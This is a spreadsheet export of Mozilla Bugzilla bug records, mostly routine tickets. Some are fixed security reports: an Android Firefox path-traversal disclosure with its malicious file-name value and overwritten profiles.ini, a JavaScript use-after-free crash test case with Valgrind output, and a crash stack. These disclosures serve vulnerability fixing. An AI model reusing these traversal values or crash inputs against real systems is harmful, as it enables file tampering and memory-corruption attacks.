      <c r="T1123" t="n">
        <v>1</v>
      </c>
      <c r="U1123" t="n">
        <v>0</v>
      </c>
      <c r="V1123" t="n">
        <v>8</v>
      </c>
      <c r="W1123" t="inlineStr">
        <is>
          <t>We need build slaves for all supported build platforms attached to the preproduction system.</t>
        </is>
      </c>
      <c r="X1123" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" t="n">
        <v>1652360</v>
      </c>
      <c r="B1124" t="inlineStr">
        <is>
          <t>2020-07-12 14:32:34 -0700</t>
        </is>
      </c>
      <c r="C1124" t="inlineStr">
        <is>
          <t>Path traversal in upload feature allows internal file overwrite</t>
        </is>
      </c>
      <c r="D1124" t="inlineStr">
        <is>
          <t>2024-05-30 10:16:37 -0700</t>
        </is>
      </c>
      <c r="E1124" t="n">
        <v>1</v>
      </c>
      <c r="F1124" t="n">
        <v>1</v>
      </c>
      <c r="G1124" t="n">
        <v>6</v>
      </c>
      <c r="H1124" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1124" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1124" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1124" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1124" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1124" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1124" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1124" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-esr68.11+]</t>
        </is>
      </c>
      <c r="Q1124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1124" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1124" t="n">
        <v>0</v>
      </c>
      <c r="U1124" t="n">
        <v>0</v>
      </c>
      <c r="V1124" t="n">
        <v>26</v>
      </c>
      <c r="W1124" t="inlineStr">
        <is>
          <t>## Summary
A missing sanitisation of file names allows a malicious file picker to overwrite any file in Firefox's internal directory.
## Environment
- **Device:**  HTC m8
- **OS version:** Android 9
- **Package name:** org.mozilla.firefox
- **App version:** 68.10.1
---
## Proof of concept
### Pre-conditions:
- PoC installed (see attachments)
- Firefox installed
- Server running the attached HTML page (or directly open it)
### Steps:
1. Open the webpage containing the upload logic
2. Tap Upload and choose Files
3. Choose `mozillatraverse` as the file picker
4. Restart Firefox
5. Check PoC public app directory `/sdcard/Android/app.kans.mozillatraverse/files/`
### Result
`profile.ini` is overwritten and now points to the location of the profile to another apps directory
### Expected result
There should be no private file overwrite.
---
## Detailed explanation
When the PoC app is chosen as the picker, the following URI is returned to Firefox:
```
content://app.kans.mozillatraverse.provider
```
This URI is a `content://` URI that belongs to the PoC app itself. Firefox will process this URI and queries the contents of the cursor which are:
| _display name                                                | _size |
| ------------------------------------------------------------ | ----- |
| `/../../../../../../../../../data/data/org.mozilla.firefox/files/mozilla/profiles.ini` | 123   |
Firefox will create a temporary file with the contents of `content://app.kans.mozillatraverse.provider` and to create this temporary file, it uses the `_display_name` column to create a file with the same name. 
Because the contents of this column are not sanitised, the path concatenation leads to a path traversal:
```java
String fileName = cursor.getString(0);
//...
tempDir = FileUtils.createTempDir(cacheDir, "tmp_");
File file = new File(tempDir, fileName);
```
This causes the contents of `profile.ini` to be overwritten with:
```
[Profile0]
Name=default
Default=1
IsRelative=0
Path=/../../../../../../../../../../sdcard/Android/data/app.kans.mozillatraverse/files/
[General]
StartWithLastProfile=1
```
After restarting Firefox, sensitive information is now stored and under controll of the malicious app.
---
## Vulnerable code
- [FilePickerResultHandler](https://phabricator.services.mozilla.com/source/mozilla-central/browse/default/mobile/android/base/java/org/mozilla/gecko/FilePickerResultHandler.java$228)
```
String fileName = cursor.getString(0);
```
---
## Remediation
Firefox should sanitise the contents of this column before using them:
```
String fileName = cursor.getString(0);
// sanitize
int index = fileName.lastIndexOf(separatorChar)
fileName = index &lt; prefixLength ? path.substring(prefixLength) : path.substring(index + 1)
```
---
## Attachments
- PoC.zip -  Source code of PoC 
- poc.apk - Compiled binary
- index.html - HTML file uploaded
- video.mp4 - Video showing exploit in action
---
## Impact
A malicious file picker could deploy a targeted attack for Firefox (by calling `getCallingActivity` for example) and tamper any file inside the private directory of Firefox. 
In this PoC, I've changed the path of the profile to another one. Any file can be affected by this.</t>
        </is>
      </c>
      <c r="X1124" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" t="n">
        <v>439735</v>
      </c>
      <c r="B1125" t="inlineStr">
        <is>
          <t>2008-06-17 15:26:03 -0700</t>
        </is>
      </c>
      <c r="C1125" t="inlineStr">
        <is>
          <t>exploitable crash at nsBlockFrame::DrainOverflowLines</t>
        </is>
      </c>
      <c r="D1125" t="inlineStr">
        <is>
          <t>2009-01-05 12:05:30 -0800</t>
        </is>
      </c>
      <c r="E1125" t="n">
        <v>1</v>
      </c>
      <c r="F1125" t="n">
        <v>1</v>
      </c>
      <c r="G1125" t="n">
        <v>3</v>
      </c>
      <c r="H1125" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1125" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1125" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1125" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L1125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1125" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1125" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1125" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1125" t="inlineStr">
        <is>
          <t>[sg:critical] trunk fixed by 372237</t>
        </is>
      </c>
      <c r="Q1125" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1125" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1125" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1125" t="n">
        <v>1</v>
      </c>
      <c r="U1125" t="n">
        <v>0</v>
      </c>
      <c r="V1125" t="n">
        <v>24</v>
      </c>
      <c r="W1125" t="inlineStr">
        <is>
          <t>Created attachment 325456
iSight Partners PoC
This was reported to Mozilla today by iSight Partners.  I can confirm that the PoC page (which I'll attach shortly) crashes Firefox 2.0.0.14 on all three platforms.  On Mac, I crash with the stack pasted below.  Note that address space that we crash on is identical to that mentioned in the advisory.  The full report is attached.
Process:         firefox-bin [28540]
Path:            /Applications/Firefox 2.app/Contents/MacOS/firefox-bin
Identifier:      org.mozilla.firefox
Version:         2.0.0.14 (2.0.0.14)
Code Type:       X86 (Native)
Parent Process:  launchd [1]
Date/Time:       2008-06-17 15:03:57.922 -0700
OS Version:      Mac OS X 10.5.3 (9D34)
Report Version:  6
Exception Type:  EXC_BAD_INSTRUCTION (SIGILL)
Exception Codes: 0x0000000000000001, 0x0000000000000000
Crashed Thread:  0
Thread 0 Crashed:
0   ???                           	0x02020202 0 + 33686018
1   org.mozilla.firefox           	0x005f2769 nsBlockFrame::DrainOverflowLines(nsBlockReflowState&amp;) + 959
2   org.mozilla.firefox           	0x005f6b48 nsBlockFrame::ComputeFinalSize(nsHTMLReflowState const&amp;, nsBlockReflowState&amp;, nsHTMLReflowMetrics&amp;) + 2498
3   org.mozilla.firefox           	0x0042afbc nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;) + 94
4   org.mozilla.firefox           	0x0061ecf4 CanvasFrame::GetType() const + 1358
5   org.mozilla.firefox           	0x0042afbc nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;) + 94</t>
        </is>
      </c>
      <c r="X1125" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1126">
      <c r="A1126" t="n">
        <v>1112693</v>
      </c>
      <c r="B1126" t="inlineStr">
        <is>
          <t>2014-12-17 11:17:10 -0800</t>
        </is>
      </c>
      <c r="C1126" t="inlineStr">
        <is>
          <t>Add Android 4.2, 4.3, 4.4, 5.0 to Treeherder UI thPlatformNameMap</t>
        </is>
      </c>
      <c r="D1126" t="inlineStr">
        <is>
          <t>2015-05-20 04:31:01 -0700</t>
        </is>
      </c>
      <c r="E1126" t="n">
        <v>1</v>
      </c>
      <c r="F1126" t="n">
        <v>1</v>
      </c>
      <c r="G1126" t="n">
        <v>7</v>
      </c>
      <c r="H1126" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1126" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1126" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1126" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1126" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1126" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1126" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1126" t="inlineStr"/>
      <c r="Q1126" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1126" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1126" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1126" t="n">
        <v>1</v>
      </c>
      <c r="U1126" t="n">
        <v>0</v>
      </c>
      <c r="V1126" t="n">
        <v>13</v>
      </c>
      <c r="W1126" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1071572 +++
https://github.com/mozilla/treeherder-ui/blob/master/webapp/app/js/values.js#L7
needs api11 entries for android-4-2, android-4-3 and android-4-4. We might as well add android-5.0 while we are at it.
This is needed for Autophone at a minimum.</t>
        </is>
      </c>
      <c r="X1126" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" t="n">
        <v>315254</v>
      </c>
      <c r="B1127" t="inlineStr">
        <is>
          <t>2005-11-06 00:12:24 -0800</t>
        </is>
      </c>
      <c r="C1127" t="inlineStr">
        <is>
          <t>CVE-2006-1529 Crash [@ js_FreeStack] involving the unknown protocol error dialog</t>
        </is>
      </c>
      <c r="D1127" t="inlineStr">
        <is>
          <t>2007-04-05 13:44:42 -0700</t>
        </is>
      </c>
      <c r="E1127" t="n">
        <v>1</v>
      </c>
      <c r="F1127" t="n">
        <v>1</v>
      </c>
      <c r="G1127" t="n">
        <v>3</v>
      </c>
      <c r="H1127" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1127" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1127" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1127" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1127" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1127" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1127" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1127" t="inlineStr">
        <is>
          <t>[sg:critical?] Doesn't appear to affect ff1.0 [rft-dl]</t>
        </is>
      </c>
      <c r="Q1127" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1127" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1127" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1127" t="n">
        <v>1</v>
      </c>
      <c r="U1127" t="n">
        <v>0</v>
      </c>
      <c r="V1127" t="n">
        <v>20</v>
      </c>
      <c r="W1127" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051105 Firefox/1.6a1
Found using http://toadstool.se/software/iexploder/ (Tests #8200-8250).
See also bug 312680 and bug 74331.</t>
        </is>
      </c>
      <c r="X1127" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" t="n">
        <v>1276413</v>
      </c>
      <c r="B1128" t="inlineStr">
        <is>
          <t>2016-05-27 22:13:03 -0700</t>
        </is>
      </c>
      <c r="C1128" t="inlineStr">
        <is>
          <t>Clear the buffer we allocate for paletted image frames</t>
        </is>
      </c>
      <c r="D1128" t="inlineStr">
        <is>
          <t>2017-08-28 13:30:19 -0700</t>
        </is>
      </c>
      <c r="E1128" t="n">
        <v>1</v>
      </c>
      <c r="F1128" t="n">
        <v>1</v>
      </c>
      <c r="G1128" t="n">
        <v>3</v>
      </c>
      <c r="H1128" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1128" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1128" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1128" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1128" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1128" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1128" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1128" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1128" t="inlineStr">
        <is>
          <t>[adv-main49+]</t>
        </is>
      </c>
      <c r="Q1128" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1128" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1128" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T1128" t="n">
        <v>1</v>
      </c>
      <c r="U1128" t="n">
        <v>0</v>
      </c>
      <c r="V1128" t="n">
        <v>14</v>
      </c>
      <c r="W1128" t="inlineStr">
        <is>
          <t>The new GTests I'm adding in bug 1276061 revealed that we aren't clearing the memory for paletted image frames when we allocate them. This is a security bug waiting to happen. Let's nip this in the bud ASAP.</t>
        </is>
      </c>
      <c r="X1128" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" t="n">
        <v>620554</v>
      </c>
      <c r="B1129" t="inlineStr">
        <is>
          <t>2010-12-20 15:42:09 -0800</t>
        </is>
      </c>
      <c r="C1129" t="inlineStr">
        <is>
          <t>Modify Newsletter Signup on First Run Page</t>
        </is>
      </c>
      <c r="D1129" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1129" t="n">
        <v>1</v>
      </c>
      <c r="F1129" t="n">
        <v>1</v>
      </c>
      <c r="G1129" t="n">
        <v>5</v>
      </c>
      <c r="H1129" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1129" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1129" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1129" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1129" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1129" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1129" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1129" t="inlineStr"/>
      <c r="Q1129" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1129" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1129" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="T1129" t="n">
        <v>1</v>
      </c>
      <c r="U1129" t="n">
        <v>0</v>
      </c>
      <c r="V1129" t="n">
        <v>45</v>
      </c>
      <c r="W1129" t="inlineStr">
        <is>
          <t>We would like to emphasize the newsletter more on this First Run page since right now it's below the fold and not a main CTA. We want to work within the existing new design and simply move the email module into the main content area and: 
-Decrease the amount of white space on the top of the page
-Remove bottom social media module
-Move newsletter signup, and the consequential UI filling out of newsletter form fields into the main content area as well. 
Assigning this bug to me as Lee works on the mockup to help display this.</t>
        </is>
      </c>
      <c r="X1129" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" t="n">
        <v>1317579</v>
      </c>
      <c r="B1130" t="inlineStr">
        <is>
          <t>2016-11-14 19:54:13 -0800</t>
        </is>
      </c>
      <c r="C1130" t="inlineStr">
        <is>
          <t>Don't send a sync ping for self-hosters</t>
        </is>
      </c>
      <c r="D1130" t="inlineStr">
        <is>
          <t>2017-01-19 07:20:43 -0800</t>
        </is>
      </c>
      <c r="E1130" t="n">
        <v>1</v>
      </c>
      <c r="F1130" t="n">
        <v>1</v>
      </c>
      <c r="G1130" t="n">
        <v>2</v>
      </c>
      <c r="H1130" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1130" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1130" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1130" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1130" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1130" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1130" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1130" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1130" t="inlineStr"/>
      <c r="Q1130" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1130" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1130" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T1130" t="n">
        <v>1</v>
      </c>
      <c r="U1130" t="n">
        <v>0</v>
      </c>
      <c r="V1130" t="n">
        <v>6</v>
      </c>
      <c r="W1130" t="inlineStr">
        <is>
          <t>People self-hosting their sync servers can skew our stats, particularly if they don't upgrade the server components. For example, such users may account for pings that have a zero'd |uid|.
I initially thought we should just record the fact it is a custom config in the ping, but then thought we should just not bother sending a ping at all, which would probably better meet the expectations of those users.
I think just checking Services.prefs.prefHasUserValue("identity.sync.tokenserver.uri") is enough for this purpose - that will also exclude staging etc too, which I think is what we want. One consideration for the implementation is TPS - we probably *do* want to arrange for it to validate the ping it would have sent had it been against prod.</t>
        </is>
      </c>
      <c r="X1130" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" t="n">
        <v>537296</v>
      </c>
      <c r="B1131" t="inlineStr">
        <is>
          <t>2009-12-30 11:30:47 -0800</t>
        </is>
      </c>
      <c r="C1131" t="inlineStr">
        <is>
          <t>fennec desktop release builders</t>
        </is>
      </c>
      <c r="D1131" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1131" t="n">
        <v>1</v>
      </c>
      <c r="F1131" t="n">
        <v>1</v>
      </c>
      <c r="G1131" t="n">
        <v>5</v>
      </c>
      <c r="H1131" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1131" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1131" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1131" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1131" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1131" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1131" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1131" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1131" t="inlineStr"/>
      <c r="Q1131" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1131" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1131" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1131" t="n">
        <v>1</v>
      </c>
      <c r="U1131" t="n">
        <v>0</v>
      </c>
      <c r="V1131" t="n">
        <v>13</v>
      </c>
      <c r="W1131" t="inlineStr">
        <is>
          <t>In alphas and betas, we've released semi-official desktop versions with the Maemo builds.  We currently don't have an automated way to build desktop fennec off tags (and upload to the candidates dir).</t>
        </is>
      </c>
      <c r="X1131" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" t="n">
        <v>746103</v>
      </c>
      <c r="B1132" t="inlineStr">
        <is>
          <t>2012-04-17 04:38:14 -0700</t>
        </is>
      </c>
      <c r="C1132" t="inlineStr">
        <is>
          <t>Crash [@ js::types::TypeSet::add] with valgrind errors indicating use-after-free</t>
        </is>
      </c>
      <c r="D1132" t="inlineStr">
        <is>
          <t>2016-12-01 13:31:40 -0800</t>
        </is>
      </c>
      <c r="E1132" t="n">
        <v>1</v>
      </c>
      <c r="F1132" t="n">
        <v>1</v>
      </c>
      <c r="G1132" t="n">
        <v>3</v>
      </c>
      <c r="H1132" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1132" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1132" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1132" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1132" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1132" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1132" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1132" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1132" t="inlineStr">
        <is>
          <t>[sg:critical][js:p1:fx16][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q1132" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1132" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1132" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T1132" t="n">
        <v>1</v>
      </c>
      <c r="U1132" t="n">
        <v>0</v>
      </c>
      <c r="V1132" t="n">
        <v>27</v>
      </c>
      <c r="W1132" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision c61e7c3a232a (options -m -n -a):
gczeal(2);
function testCallProtoMethod() {
    function X() { 
        this.valueOf = new testCallProtoMethod( "return this.value" );
    } 
    X.prototype.getName = function () { return "X"; }
    var a = [new X, new X, new getName, new new this, new Y];
}
testCallProtoMethod();
Although this particular test crashes with a null pointer deref, it seems to be rather a memory corruption (original test crashed with non-null pointer). Also Valgrind shows the following errors:
==5904== Invalid read of size 8
==5904==    at 0x77B4B3: SetPropCompiler::updateMonitoredTypes() (PolyIC.cpp:480)
==5904==    by 0x77BB7E: SetPropCompiler::update() (PolyIC.cpp:613)
==5904==    by 0x7819FE: js::mjit::ic::SetProp(js::VMFrame&amp;, js::mjit::ic::PICInfo*) (PolyIC.cpp:1911)
==5904==    by 0x6D1361: ??? (in /srv/repos/mozilla-central/js/src/debug64/shell/js)
==5904==    by 0x6D28C6: js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) (MethodJIT.cpp:1052)
[...]
==5904==  Address 0x720c1a8 is 1,704 bytes inside a block of size 1,736 free'd
==5904==    at 0x4C282ED: free (vg_replace_malloc.c:366)
==5904==    by 0x4039DE: js_free (Utility.h:201)
[...]
==5904==    by 0x6D3565: js::mjit::JITScript::destroyChunk(js::FreeOp*, unsigned int, bool) (MethodJIT.cpp:1332)
==5904==    by 0x6D34A0: js::mjit::JITScript::destroy(js::FreeOp*) (MethodJIT.cpp:1319)
==5904==    by 0x6D3A72: JSScript::ReleaseCode(js::FreeOp*, JSScript::JITScriptHandle*) (MethodJIT.cpp:1456)
==5904==    by 0x4846B9: js::mjit::ReleaseScriptCode(js::FreeOp*, JSScript*) (MethodJIT.h:908)
==5904==    by 0x486E5C: JSCompartment::discardJitCode(js::FreeOp*) (jscompartment.cpp:486)
==5904==    by 0x487156: JSCompartment::sweep(js::FreeOp*, bool) (jscompartment.cpp:530)
==5904==
==5904== Invalid read of size 8
==5904==    at 0x4E40E7: js::types::TypeSet::add(JSContext*, js::types::TypeConstraint*, bool) (jsinfer.cpp:396)
==5904==    by 0x4E471A: js::types::TypeSet::addSubset(JSContext*, js::types::TypeSet*) (jsinfer.cpp:534)
==5904==    by 0x77B4C5: SetPropCompiler::updateMonitoredTypes() (PolyIC.cpp:480)
==5904==    by 0x77BB7E: SetPropCompiler::update() (PolyIC.cpp:613)
==5904==    by 0x7819FE: js::mjit::ic::SetProp(js::VMFrame&amp;, js::mjit::ic::PICInfo*) (PolyIC.cpp:1911)
[...]
==5904==    by 0x6D2B56: CheckStackAndEnterMethodJIT(JSContext*, js::StackFrame*, void*, bool) (MethodJIT.cpp:1111)
==5904==  Address 0x71d0568 is 29,000 bytes inside a block of size 131,072 free'd
==5904==    at 0x4C282ED: free (vg_replace_malloc.c:366)
[...]
==5904==    by 0x4C0E31: js::gc::RunDebugGC(JSContext*) (jsgc.cpp:3929)
Marking s-s as this looks like a GC use-after-free.</t>
        </is>
      </c>
      <c r="X1132" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" t="n">
        <v>1256328</v>
      </c>
      <c r="B1133" t="inlineStr">
        <is>
          <t>2016-03-14 08:25:06 -0700</t>
        </is>
      </c>
      <c r="C1133" t="inlineStr">
        <is>
          <t>Set copy.loop.services.mozilla.com DNS record for initial copy panel rollout testing</t>
        </is>
      </c>
      <c r="D1133" t="inlineStr">
        <is>
          <t>2016-05-19 10:42:15 -0700</t>
        </is>
      </c>
      <c r="E1133" t="n">
        <v>1</v>
      </c>
      <c r="F1133" t="n">
        <v>1</v>
      </c>
      <c r="G1133" t="n">
        <v>2</v>
      </c>
      <c r="H1133" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1133" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J1133" t="inlineStr">
        <is>
          <t>Operations: Miscellaneous</t>
        </is>
      </c>
      <c r="K1133" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1133" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1133" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1133" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1133" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1133" t="inlineStr"/>
      <c r="Q1133" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1133" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1133" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1133" t="n">
        <v>1</v>
      </c>
      <c r="U1133" t="n">
        <v>0</v>
      </c>
      <c r="V1133" t="n">
        <v>9</v>
      </c>
      <c r="W1133" t="inlineStr">
        <is>
          <t>Similar to bug 1060809, we want copy.loop-webapp-dev.stage.mozaws.net to be 127.0.0.25 to test a 10% nightly rollout of the feature implemented in bug 1239965.
Alternatively, we could just point the add-on to a more "final" hostname: copy.loop.services.mozilla.com (?) and set the DNS A record to 127.0.0.25.
Standard8, any thoughts on using a stage.mozaws.net hostname vs services.mozilla.com?
Doesn't directly block bug 1239965 as the feature will just be turned off until the DNS entry exists (effectively treating it as a 127.0.0.0 record).</t>
        </is>
      </c>
      <c r="X1133" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" t="n">
        <v>529416</v>
      </c>
      <c r="B1134" t="inlineStr">
        <is>
          <t>2009-11-17 15:54:53 -0800</t>
        </is>
      </c>
      <c r="C1134" t="inlineStr">
        <is>
          <t>[SECURITY] Dependency lists display bug aliases even for bugs the user cannot access</t>
        </is>
      </c>
      <c r="D1134" t="inlineStr">
        <is>
          <t>2011-12-03 07:25:55 -0800</t>
        </is>
      </c>
      <c r="E1134" t="n">
        <v>1</v>
      </c>
      <c r="F1134" t="n">
        <v>1</v>
      </c>
      <c r="G1134" t="n">
        <v>4</v>
      </c>
      <c r="H1134" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1134" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1134" t="inlineStr">
